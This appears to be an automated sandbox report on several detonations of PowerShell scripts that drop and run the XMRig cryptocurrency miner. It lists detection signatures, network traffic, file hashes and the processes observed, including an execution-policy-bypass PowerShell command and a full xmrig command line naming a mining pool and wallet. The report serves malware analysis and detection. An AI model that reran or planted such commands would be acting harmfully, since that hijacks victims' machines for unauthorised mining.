N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/2180-3-0x00007FF8C0603000-0x00007FF8C0604000-memory.dmp

memory/2180-5-0x000001F4FA460000-0x000001F4FA482000-memory.dmp

memory/2180-8-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-10-0x000001F4FA590000-0x000001F4FA606000-memory.dmp

memory/2180-9-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nvxu1ghy.b15.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2180-25-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-29-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-30-0x00007FF8C0600000-0x00007FF8C0FEC000-memory.dmp

memory/2180-50-0x000001F4FA370000-0x000001F4FA382000-memory.dmp

memory/2180-63-0x000001F4FA360000-0x000001F4FA36A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2660-92-0x000001D71F0E0000-0x000001D71F100000-memory.dmp

memory/2660-93-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-94-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-95-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-96-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-97-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-98-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-99-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-100-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-101-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-102-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-103-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-104-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-105-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-106-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-107-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-108-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-109-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-110-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-111-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-112-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-113-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-114-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-115-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-116-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-117-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-118-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-119-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-120-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-121-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-122-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-123-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-124-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-125-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-126-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-127-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-128-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-129-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-130-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-131-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-132-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-133-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-134-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-135-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-136-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-137-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-138-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-139-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-140-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-141-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-142-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-143-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-144-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-145-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-146-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-147-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-148-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-149-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-150-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-151-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-152-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-153-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-154-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

memory/2660-155-0x00007FF6D9B40000-0x00007FF6DA773000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:24

Platform

win10v2004-20240508-en

Max time kernel

1798s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3960,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 45.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

memory/1476-0-0x00007FFF91693000-0x00007FFF91695000-memory.dmp

memory/1476-10-0x0000023527F20000-0x0000023527F42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emgpv20u.5wu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1476-11-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1476-12-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1476-14-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1476-16-0x0000023528190000-0x000002352819A000-memory.dmp

memory/1476-15-0x00000235281B0000-0x00000235281C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3788-47-0x0000018E4BF70000-0x0000018E4BF90000-memory.dmp

memory/3788-48-0x0000018E4D870000-0x0000018E4D890000-memory.dmp

memory/1476-50-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1476-49-0x00007FFF91693000-0x00007FFF91695000-memory.dmp

memory/3788-51-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-52-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-53-0x0000018E4D890000-0x0000018E4D8B0000-memory.dmp

memory/3788-54-0x0000018E4D8B0000-0x0000018E4D8D0000-memory.dmp

memory/1476-56-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/3788-55-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-57-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-58-0x0000018E4D890000-0x0000018E4D8B0000-memory.dmp

memory/3788-59-0x0000018E4D8B0000-0x0000018E4D8D0000-memory.dmp

memory/3788-60-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-61-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-62-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-63-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-64-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-65-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-66-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-67-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-68-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-69-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-70-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-71-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-72-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-73-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-74-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-75-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-76-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-77-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-78-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-79-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-80-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-81-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-82-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-83-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-84-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-85-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-86-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-87-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-88-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-89-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-90-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-91-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-92-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-93-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-94-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-95-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-96-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-97-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-98-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-99-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-100-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-101-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-102-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-103-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-104-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-105-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-106-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-107-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-108-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-109-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-110-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-111-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-112-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-113-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-114-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-115-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-116-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-117-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

memory/3788-118-0x00007FF6512B0000-0x00007FF651EE3000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:25

Platform

win7-20240221-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

memory/3064-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/3064-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/3064-6-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

memory/3064-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/3064-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/3064-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/3064-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/3064-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/3064-12-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win7-20240220-en

Max time kernel

1562s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

N/A

Files

memory/2908-4-0x000007FEF565E000-0x000007FEF565F000-memory.dmp

memory/2908-5-0x000000001B510000-0x000000001B7F2000-memory.dmp

memory/2908-6-0x00000000028E0000-0x00000000028E8000-memory.dmp

memory/2908-8-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2908-7-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2908-9-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2908-10-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2908-11-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

memory/2908-12-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:00

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

